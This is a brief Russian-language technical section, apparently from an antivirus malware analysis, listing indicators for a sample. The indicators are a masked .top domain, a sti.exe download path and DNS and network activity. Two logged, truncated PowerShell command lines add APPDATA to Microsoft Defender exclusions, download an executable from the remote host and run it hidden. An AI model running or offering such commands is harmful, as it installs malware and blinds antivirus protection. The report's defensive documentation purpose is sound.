Техническая информация
- http://fp###ooster.top/sti.exe как %appdata+%\sti.exe
- 'fp###ooster.top':80
- http://fp###ooster.top/sti.exe
- DNS ASK fp###ooster.top
- '<SYSTEM32>\cmd.exe' /c powershell -command "Add-MpPreference -ExclusionPath $env:appdata; (New-Object System.Net.WebClient).DownloadFile('http://fp###ooster.top/sti.exe',$env:appdata+'\sti.exe'); Start-Process "$e...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell -command "Add-MpPreference -ExclusionPath $env:appdata; (New-Object System.Net.WebClient).DownloadFile('http://fp###ooster.top/sti.exe',$env:appdata+'\sti.exe'); Start-Process "$e...